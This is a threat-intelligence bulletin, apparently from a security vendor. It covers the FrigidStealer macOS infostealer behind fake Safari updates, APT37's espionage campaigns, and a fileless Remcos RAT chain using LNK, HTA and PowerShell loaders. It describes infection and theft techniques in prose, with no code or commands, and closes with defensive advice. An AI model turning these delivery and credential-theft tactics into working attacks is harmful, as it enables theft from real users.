Update: FrigidStealer Malware Exploits macOS Users Through Fake Update Lures
FrigidStealer is a macOS-focused information stealer that has been actively targeting users since January 2025 by disguising itself as a legitimate Safari browser update. Hunter Strategy has reported on this variant and several macOS and Windows-based infostealers in recent months. FrigidStealer is one of the latest additions, demonstrating the continued evolution of data theft malware across platforms. The infection begins when users are directed to download a malicious DMG file from a compromised or spoofed website, believing it to be a routine software update. Once mounted, the user is tricked into manually launching the app and entering their system password via a fraudulent AppleScript prompt, bypassing Gatekeeper protections. The malware installs itself under the misleading name “ddaolimaki-daunito” and registers with macOS launch services using a legitimate-looking bundle ID, granting it persistence across reboots. From there, FrigidStealer silently harvests a wide range of data, including stored browser credentials, crypto wallet information, and basic system identifiers. FrigidStealer is especially concerning because it abuses macOS's trust model, combining social engineering with system-native tools for stealth and persistence. Security researchers suspect a financial motive behind the campaign, with potential ties to established cybercrime groups like EvilCorp. This campaign underscores the evolving threat landscape for macOS users, where attackers increasingly use legitimate interfaces to deploy high-impact malware. Organizations should adopt layered defenses, disable automatic mounting of disk images, and ensure employees are trained to recognize deceptive update prompts.
APT37 Expands Global Operations with Espionage-Focused Malware and Tactical Precision
Group123, a North Korean state-sponsored APT group also tracked as APT37, Reaper, and ScarCruft, has continued to evolve its operations with renewed focus on Windows-based systems across regions beyond its traditional targets. Initially concentrated on South Korea, the group expanded its campaigns to Japan, Vietnam, the Middle East, and other countries, aiming at sectors critical to national infrastructure, including Aerospace, Defense, Nuclear research, and Engineering. Recent campaigns have demonstrated a sophisticated multi-stage approach using spear phishing emails with exploits for region-specific software like Hangul Word Processor and Microsoft Office. They also leverage public-facing application vulnerabilities, including Log4j, and watering hole techniques to distribute custom malware, including ROKRAT, Konni, PoohMilk, and Freenki Loader—many of which are designed for stealth, persistence, and data theft. Beyond pure espionage, Group123 has increasingly incorporated financially motivated activity, including deploying ransomware strains like Maui, blurring traditional boundaries between nation-state and criminal operations. Their command-and-control infrastructure reflects a shift toward more resilient and evasive platforms, now leveraging legitimate cloud storage services like Google Drive and Mediafire to mask exfiltration and C2 traffic. Credential harvesting from browsers and Windows Credential Manager, UAC bypasses, encrypted HTTPS communications, and DLL sideloading are all standard tactics in their playbook. They also exhibit rapid adoption of new vulnerabilities, including zero-day exploits, to maintain an edge in access and persistence. Mapped across the MITRE ATT&CK framework, their tactics encompass drive-by compromise, command-line execution, credential dumping, and lateral movement, underscoring a mature and adaptive threat model. Organizations operating in high-risk sectors are urged to implement strong endpoint detection, maintain rigorous patch management practices, and enforce user training to reduce susceptibility to tailored phishing and drive-by attacks leveraged by Group123.
Update: Fileless Remcos RAT Campaign Highlights Surge in Stealth Malware Delivery Tactics
A recently uncovered malware campaign uses LNK files, PowerShell loaders, and obfuscated HTA scripts to stealthily deploy the Remcos Remote Access Trojan (RAT), continuing a growing trend of fileless malware attacks that bypass conventional defenses. Hunter previously reported on the abuse of LNK files and the use of Remcos RAT, but this campaign is not novel in tooling. Still, it showcases a new delivery method that combines known techniques to evade detection and execute the malware filelessly. The attack begins with phishing emails carrying ZIP archives disguised as tax or financial documents. Inside is a Windows shortcut file ([.]LNK) that leverages mshta[.]exe to launch a remote HTA file containing Visual Basic Script. This script downloads a PowerShell loader, a decoy PDF, and an additional HTA file configured to persist on startup. The PowerShell script reconstructs shellcode in memory to load Remcos RAT, giving the attacker complete control of the infected system without leaving behind typical disk-based artifacts. Once active, Remcos harvests system data, credentials, keystrokes, and clipboard contents, and communicates with its command-and-control server via encrypted TLS. This campaign is part of a broader trend involving sophisticated delivery chains that mix traditional phishing with stealthier, in-memory execution techniques. Remcos joins other malware variants—Agent Tesla, XWorm, NovaStealer, and Formbook—distributed via multi-stage [.]NET loaders, typosquatted software installers, malicious blob URIs, and HTML droppers. The increasing use of tools like mshta[.]exe, embedded scripts in RAR or ZIP files, and AI-generated phishing lures illustrates how threat actors adapt quickly to avoid detection. Emerging tactics include using steganography (hiding payloads in image bitmaps) and polymorphic delivery techniques powered by AI to alter email characteristics in real-time. As attackers blur the line between traditional malware delivery and modern evasion tactics, defenders must adopt layered approaches that include behavioral EDR, real-time PowerShell monitoring, post-delivery email threat detection, and user training to recognize evolving phishing threats.
